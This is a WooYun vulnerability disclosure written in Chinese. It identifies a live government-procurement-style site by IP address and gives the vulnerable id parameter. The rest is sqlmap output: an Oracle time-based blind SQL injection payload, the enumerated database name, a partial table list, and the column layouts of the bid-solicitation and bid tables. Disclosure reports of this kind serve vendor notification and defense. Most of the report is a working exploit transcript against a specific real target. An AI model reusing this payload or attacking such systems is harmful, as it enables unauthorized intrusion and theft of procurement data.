WooYun.org

出问题的站点：
http://222.216.4.11:7001/FPApp/index.jsp

注入点：
222.216.4.11:7001/FPApp/wbxx/news/list.jsp?id=11
基于时间的盲注，可以得到数据库名：
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=11' AND 1720=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(84)||CHR(68)||CHR(110),5) AND 'rMzw'='rMzw
---
available databases [1]:
[*] GXFP
共有101个表，不一一列举了：
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=11' AND 1720=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(84)||CHR(68)||CHR(110),5) AND 'rMzw'='rMzw
---
Database: GXFP
[101 tables]
+-----------------------------+
| DWXX |
| FP_BLOB |
| FP_BZTK |
| FP_BZTK_FB |
| FP_BZ_BMDM |
| FP_BZ_DQDM |
| FP_BZ_DQDM_ALL |
| FP_BZ_DQDM_ALL_TEST |
| FP_BZ_DQDM_XJ |
| FP_BZ_XMCC |
| FP_BZ_XMLB |
| FP_BZ_XMLX |
| FP_BZ_XMZT |
| FP_BZ_XYPG |
| FP_BZ_XYTD |
涉及招标的表：
atabase: GXFP
Table: ZHAOBIAO
[16 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| P_CODE | CHAR |
| T_CODE | VARCHAR2 |
| T_DAILI | VARCHAR2 |
| T_DQBM | CHAR |
| T_DW | VARCHAR2 |
| T_END | DATE |
| T_FANGSHI | VARCHAR2 |
| T_KAIBIAO | DATE |
| T_MEITI | VARCHAR2 |
| T_MEMO | VARCHAR2 |
| T_MONEY | NUMBER |
| T_NAME | VARCHAR2 |
| T_REN | VARCHAR2 |
| T_START | DATE |
| T_TIME | DATE |
| T_ZHUANJIA | VARCHAR2 |
涉及的投标的表：
atabase: GXFP
Table: TOUBIAO
[8 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| P_CODE | CHAR |
| T_CODE | VARCHAR2 |
| T_DQBM | CHAR |
| T_DWDM | VARCHAR2 |
| T_MEMO | VARCHAR2 |
| T_NAME | VARCHAR2 |
| T_STATE | NUMBER |
| T_TIME | DATE |
+---------+----------+